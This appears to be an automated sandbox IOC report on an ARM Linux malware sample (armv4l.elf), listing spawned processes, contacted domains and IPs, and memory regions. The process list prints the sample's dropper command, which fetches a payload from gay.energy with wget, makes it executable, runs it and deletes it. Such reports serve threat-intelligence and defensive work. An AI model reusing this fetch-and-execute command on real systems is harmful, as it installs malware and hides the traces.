IOC Report
armv4l.elf

loading gif

Processes

Path
Cmdline
Malicious
/tmp/armv4l.elf
/tmp/armv4l.elf
/tmp/armv4l.elf
-
/bin/sh
/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
/bin/sh
-
/usr/bin/wget
wget -q http://gay.energy/.../vivid -O .....
/bin/sh
-
/usr/bin/chmod
chmod 777 .....
/bin/sh
-
/bin/sh
/bin/sh ./.....
/bin/sh
-
/usr/bin/rm
rm -rf .....
/tmp/armv4l.elf
-
/tmp/armv4l.elf
-
/tmp/armv4l.elf
-
There are 4 hidden processes, click here to show them.

Domains

Name
IP
Malicious
gay.energy
unknown
malicious
daisy.ubuntu.com
162.213.35.24

IPs

IP
Domain
Country
Malicious
92.60.77.69
unknown
Italy
malicious

Memdumps

Base Address
Regiontype
Protect
Malicious
7f6420030000
page execute read
malicious
7f6420030000
page execute read
malicious
7f6420030000
page execute read
malicious
7f6525dd1000
page read and write
55cb71cb1000
page read and write
55cb6d95f000
page execute read
7f65250d3000
page read and write
7f6420039000
page read and write
7ffeb53bc000
page execute read
7f65254c7000
page read and write
55cb71cb1000
page read and write
7f6420039000
page read and write
55cb6dbb0000
page read and write
7ffeb53bc000
page execute read
7f6525732000
page read and write
7f6420040000
page read and write
7f6420040000
page read and write
7f6525c84000
page read and write
55cb6dbb9000
page read and write
55cb6d95f000
page execute read
7f651ffff000
page read and write
7f6525165000
page read and write
7f6525aa3000
page read and write
55cb6fbb7000
page execute and read and write
7f6520021000
page read and write
7ffeb5253000
page read and write
7f6525e16000
page read and write
55cb6dbb0000
page read and write
55cb6dbb0000
page read and write
7f6525dad000
page read and write
7ffeb5253000
page read and write
55cb6fbce000
page read and write
7f6525165000
page read and write
7f6525165000
page read and write
7f65254c7000
page read and write
7f6525755000
page read and write
7f6525c84000
page read and write
55cb71cb1000
page read and write
55cb6d95f000
page execute read
55cb6dbb9000
page read and write
7ffeb5253000
page read and write
7f6525755000
page read and write
55cb6fbb7000
page execute and read and write
7ffeb53bc000
page execute read
7f6525c84000
page read and write
7f6420039000
page read and write
7f6525aa3000
page read and write
7f6525dd1000
page read and write
7f65250d3000
page read and write
7f6525732000
page read and write
7f6520021000
page read and write
7f651ffff000
page read and write
7f6420040000
page read and write
7f65258c1000
page read and write
7f6525dd1000
page read and write
55cb6fbce000
page read and write
7f6525aa3000
page read and write
7f65258c1000
page read and write
7f6525755000
page read and write
7f65258c1000
page read and write
7f6525e16000
page read and write
7f6525dad000
page read and write
7f6520021000
page read and write
55cb6fbce000
page read and write
7f65248cb000
page read and write
55cb6dbb9000
page read and write
7f6525dad000
page read and write
7f65254c7000
page read and write
55cb6fbb7000
page execute and read and write
7f651ffff000
page read and write
7f6525e16000
page read and write
7f65248cb000
page read and write
7f65250d3000
page read and write
7f6525732000
page read and write
7f65248cb000
page read and write
There are 65 hidden memdumps, click here to show them.